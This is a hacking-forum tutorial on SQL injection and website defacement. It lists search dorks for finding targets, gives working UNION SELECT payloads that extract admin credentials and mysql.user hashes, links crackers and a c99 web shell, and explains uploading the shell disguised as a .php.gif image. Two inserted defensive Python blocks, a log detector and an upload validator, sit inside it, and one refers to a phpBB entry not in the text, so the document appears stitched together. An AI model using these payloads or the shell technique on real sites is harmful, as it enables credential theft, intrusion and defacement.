    inurl:index.php?id=
    inurl:trainers.php?id=
    inurl:buy.php?category=
    inurl:article.php?ID=
    inurl:play_old.php?id=
    inurl:declaration_more.php?decl_id=
    inurl:pageid=
    inurl:games.php?id=
    inurl:page.php?file=
    inurl:newsDetail.php?id=
    inurl:gallery.php?id=

    Here are some More Queries (use them without quotation marks)..

    Now the admin password hacking procedure starts:
    You can also refer to my previous post on hacking websites:


    HACKING WEBSITES : HOW TO HACK WEBSITES BY USING SQL INJECTION


    1). Check for vulnerability


    Let's say that we have some site like this

    http://www.site.com/news.php?id=5

    Now to test if it is vulnerable we add a ' (quote) to the end of the URL,

    and that would be http://www.site.com/news.php?id=5'

    so if we get some error like

    "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
    or something similar that means the Site is vulnerable to SQL injection.


    2). Find the number of columns

    To find the number of columns we use the ORDER BY statement (it tells the database how to order the result). So how do we use it? We just increment the number until we get an error.

    http://www.site.com/news.php?id=5 order by 1/* <-- no error
    http://www.site.com/news.php?id=5 order by 2/* <-- no error
    http://www.site.com/news.php?id=5 order by 3/* <-- no error
    http://www.site.com/news.php?id=5 order by 4/* <-- error (we get a message like "Unknown column '4' in 'order clause'" or something like that)

    that means that it has 3 columns, because we got an error on 4.

    3). Check for UNION function
    With union we can select more data in one sql statement.

    So we have
    http://www.site.com/news.php?id=5 union all select 1,2,3/*
    (we already found that the number of columns is 3 in section 2).)

    if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works .

    4). Check for MySQL version
    http://www.site.com/news.php?id=5 union all select 1,2,3/*
    NOTE: if /* is not working or you get some error, then try --
    it's a comment and it's important for our query to work properly.

    Let's say that we have number 2 on the screen; now to check the version
    we replace the number 2 with @@version or version() and get something like 4.1.33-log or 5.0.45 or similar.

    it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*

    If you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."

    I didn't see any paper covering this problem, so I must write it.

    What we need is convert() function

    i.e.
    http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

    or with hex() and unhex()

    i.e.
    http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

    and you will get MySQL version .




    5). Getting table and column name

    well if the MySQL version is < 5 (i.e. 4.1.33, 4.1.12...) <--- later I will describe the MySQL > 5 version.
    we must guess table and column names in most cases.

    common table names are: user/s, admin/s, member/s ...

    common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...

    i.e. it would be
    http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/*
    (we see number 2 on the screen like before, and that's good)

    We know that table admin exists...

    Now to check column names.
    http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/*
    (if you get an error, then try the other column name)

    we get the username displayed on screen; an example would be admin, or superadmin etc...

    now to check if the column password exists
    http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/*
    (if you get an error, then try the other column name)

    we see the password on the screen in hash or plain text; it depends on how the database is set up,
    i.e. md5 hash, mysql hash, sha1...

    Now we must complete the query to look nice.

    For that we can use the concat() function (it joins strings)

    i.e.
    http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
    Note that I put 0x3a, the hex value for : (so 0x3a is the hex value for a colon)

    (there is another way for that, char(58), the ASCII value for :)
    http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
    Now we get username:password displayed on screen, i.e. admin:admin or admin:somehash

    When you have this, you can log in as admin or some superuser.

    If you can't guess the right table name, you can always try mysql.user (default)

    It has user and password columns, so an example would be
    http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*


    6). MySQL 5

    Like i said before i'm gonna explain how to get table and column names
    in MySQL > 5.

    For this we need information_schema. It holds all tables and columns in database.

    to get tables we use table_name and information_schema.tables.

    i.e.
    http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

    here we replace our number 2 with table_name to get the first table from information_schema.tables
    displayed on the screen. Now we must add LIMIT to the end of the query to list out all tables.

    i.e.
    http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
    note that I put 0,1 (get 1 result starting from the 0th)

    now to view the second table, we change limit 0,1 to limit 1,1

    i.e.
    http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
    the second table is displayed.

    for the third table we put limit 2,1

    i.e.
    http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

    Keep incrementing until you get something useful like db_admin, poll_user, auth, auth_user etc...

    To get the column names the method is the same.

    here we use column_name and information_schema.columns

    the method is the same as above, so an example would be
    http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
    The first column is displayed.

    The second one (we change limit 0,1 to limit 1,1)

    i.e.
    http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

    The second column is displayed, so keep incrementing until you get something like

    username,user,login, password, pass, passwd etc...

    If you wanna display column names for specific table use this query. (where clause)

    Let's say that we found table users.

    i.e.
    http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*
    Now we get the column names in table users displayed. Just using LIMIT we can list all columns in table users.

    Note that this won't work if the magic quotes is ON.

    Let's say that we found columns user, pass and email.

    Now to complete the query to put them all together.

    For that we use concat(), which I described earlier.

    i.e.
    http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email),3 from users/*

    What we get here is user:pass:email from table users.

    Example: admin:hash:whatever@blabla.com
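    Added example, not part of the tutorial above or of kinghackz.net: a small Python log review that flags the probing sequence just walked through (quote probe, ORDER BY column counting, UNION SELECT, @@version, information_schema enumeration) in web-server access logs, so the sequence can be spotted before the concat() step reaches a password column. The log lines, signature names, weights and threshold are constructed for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Constructed sample lines in common log format (not real traffic). The first
# source walks through the tutorial's sequence: quote probe, ORDER BY column
# counting, UNION SELECT, @@version, then information_schema enumeration.
SAMPLE_LOG = """\
203.0.113.7 - - [19/Aug/2012:10:01:02 +0000] "GET /news.php?id=5 HTTP/1.1" 200 5120
203.0.113.7 - - [19/Aug/2012:10:01:05 +0000] "GET /news.php?id=5' HTTP/1.1" 500 312
203.0.113.7 - - [19/Aug/2012:10:01:09 +0000] "GET /news.php?id=5%20order%20by%201/* HTTP/1.1" 200 5120
203.0.113.7 - - [19/Aug/2012:10:01:12 +0000] "GET /news.php?id=5%20order%20by%204/* HTTP/1.1" 500 312
203.0.113.7 - - [19/Aug/2012:10:01:20 +0000] "GET /news.php?id=5%20union%20all%20select%201,@@version,3/* HTTP/1.1" 200 5200
203.0.113.7 - - [19/Aug/2012:10:01:31 +0000] "GET /news.php?id=5%20union%20all%20select%201,table_name,3%20from%20information_schema.tables%20limit%200,1/* HTTP/1.1" 200 5190
198.51.100.3 - - [19/Aug/2012:10:02:00 +0000] "GET /news.php?id=7 HTTP/1.1" 200 4980
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# (name, pattern, weight): weights are illustrative, chosen so that column
# counting plus a single UNION SELECT already crosses the default threshold.
SIGNATURES = [
    ("quote_probe", re.compile(r"'"), 1),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I), 2),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I), 4),
    ("version_fingerprint", re.compile(r"@@version|\bversion\(\)", re.I), 2),
    ("schema_enumeration", re.compile(r"\binformation_schema\.", re.I), 4),
    ("concat_exfil", re.compile(r"\bconcat\(", re.I), 2),
    ("comment_terminator", re.compile(r"/\*|--\s*$"), 1),
]
WEIGHTS = {name: weight for name, _rx, weight in SIGNATURES}

def decode_query(target):
    """URL-decode the query string of a request target ('' if it has none)."""
    return unquote_plus(urlsplit(target).query)

def classify_request(target):
    """Names of the signatures matched by one request target, in SIGNATURES order."""
    query = decode_query(target)
    return [name for name, rx, _w in SIGNATURES if rx.search(query)]

def analyze_log(log_text, threshold=6):
    """Aggregate signature hits per source IP and flag suspicious sources."""
    per_ip = defaultdict(lambda: {"requests": 0, "score": 0, "hits": []})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        rec = per_ip[m.group("ip")]
        rec["requests"] += 1
        for name in classify_request(m.group("target")):
            rec["score"] += WEIGHTS[name]
            if name not in rec["hits"]:
                rec["hits"].append(name)
    for rec in per_ip.values():
        # Flag on cumulative score, or on the escalation from column counting
        # (ORDER BY n) to data extraction (UNION SELECT) regardless of score.
        escalated = "order_by_probe" in rec["hits"] and "union_select" in rec["hits"]
        rec["flagged"] = rec["score"] >= threshold or escalated
    return dict(per_ip)
```

    Running analyze_log(SAMPLE_LOG) flags 203.0.113.7 with all six signatures and leaves 198.51.100.3 unflagged; a real deployment would tune the weights against its own traffic.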

    ** If you are too lazy for doing above stuff you can use tools they will do all the job:

    1) Exploit scanner (this will find vulnerable websites)
    Code:http://rapidshare.com/files/24802790...oitscanner.zip

    2) SQLi helper (this tool will do all the injecting job and get you the pass or hash)
    Code:http://rapidshare.com/files/24802907...elperV.2.7.rar

    *** use the tools only if you are new to hacking. Do it manually, that's the thrill and that is real hacking. When you do it manually you will understand the concept.

    In some websites you can directly see the password, but most of the websites encrypt them using MD5, so you have to crack the hash to get the password.

    To crack the password there are three ways
    1) Check the net whether this hash is cracked before:
    Download:http://www.md5decrypter.co.uk

    2) Crack the password with the help of a site:
    Download::http://www.milw0rm.com/cracker/insert.php

    http://passcracking.com/index.php

    3) Use a MD5 cracking software:
    Download:http://rapidshare.com/files/13696796...CF_2.10_2b.rar

    Password = OwlsNest



    2) DEFACING THE WEBSITE

    After getting the password you can login as the admin of the site. But first you have to find the admin login page for the site. There are three methods to find the admin panel.

    1) You can use an admin finder website:
    Code:http://4dm1n.houbysoft.com/

    2) You can use an admin finder software:

    Code:http://rapidshare.com/files/248020485/adminfinder.rar

    After logging in as the admin you can upload photos to the site. So now you are going to upload a shell into the site using this upload facility.

    Download the shell here: http://rapidshare.com/files/248023722/c99.rar

    Extract it and you will get a c99.php; upload it.
    Some sites won't allow you to upload a php file, so rename it as c99.php.gif
    Then upload it.

    After that go to http://www.site.com/images (in most sites images are saved in this dir, but if you can't find c99 there then you have to guess the dir)

    find the c99.php.gif and click it..

    Now you can see a big control panel....
    Now you can do whatever you want to do...
    Search for the index.html file and replace it with your own file.
    So if anyone goes to that site they will see your page....
    After doing this click on Logout and you are done..
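    Added example, not code from phpBB or from this tutorial: server-side upload validation that rejects the renamed-shell trick relied on above (Sh3ll.php.jpg in the phpBB entry, c99.php.gif here) by checking every dotted segment of the filename and the file's magic bytes, then storing accepted files under a random name. The allowlist, regex and helper names are assumptions made for this example.

```python
import os
import re
import secrets

# Allowed image types: canonical extension -> accepted leading bytes (magic).
IMAGE_MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
ALIASES = {"jpeg": "jpg"}

# A server-side script extension as any dotted segment of the name, not only
# the last one: Apache's mod_mime considers every extension of a multi-extension
# name, so with a PHP handler configured "x.php.jpg" can still run as PHP.
SCRIPT_SEGMENT = re.compile(
    r"\.(php\d?|phtml|phar|cgi|pl|py|asp|aspx|jsp|sh|htaccess)(?=\.|$)", re.I)


class UploadRejected(ValueError):
    """Raised when an upload fails validation; the message says why."""


def validate_upload(filename, data):
    """Return the canonical extension to store the file under, or raise UploadRejected."""
    base = os.path.basename(filename.replace("\\", "/"))  # strip any client path
    if not base or base.startswith("."):
        raise UploadRejected("empty or dot-prefixed filename")
    if SCRIPT_SEGMENT.search(base):
        # rejects Sh3ll.php.jpg and c99.php.gif even though they end in an image extension
        raise UploadRejected("script extension inside filename: %s" % base)
    ext = base.rsplit(".", 1)[1].lower() if "." in base else ""
    ext = ALIASES.get(ext, ext)
    if ext not in IMAGE_MAGIC:
        raise UploadRejected("extension not allowed: %r" % ext)
    if not data.startswith(IMAGE_MAGIC[ext]):
        raise UploadRejected("content is not a %s image" % ext)
    # A PHP tag inside an otherwise valid image (polyglot) is still rejected;
    # a production service would re-encode the image rather than only scan it.
    if b"<?php" in data or b"<?=" in data:
        raise UploadRejected("embedded PHP tag in image data")
    return ext


def is_accepted(filename, data):
    """True if validate_upload() would accept the file, False otherwise."""
    try:
        validate_upload(filename, data)
        return True
    except UploadRejected:
        return False


def store_upload(filename, data, upload_dir):
    """Validate, then write under a random name with the canonical extension.
    upload_dir is assumed to sit outside the web root (or be served with script
    execution disabled); the client-supplied name never reaches the filesystem."""
    ext = validate_upload(filename, data)
    path = os.path.join(upload_dir, "%s.%s" % (secrets.token_hex(16), ext))
    with open(path, "wb") as fh:
        fh.write(data)
    return path
```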


    From: kinghackz.net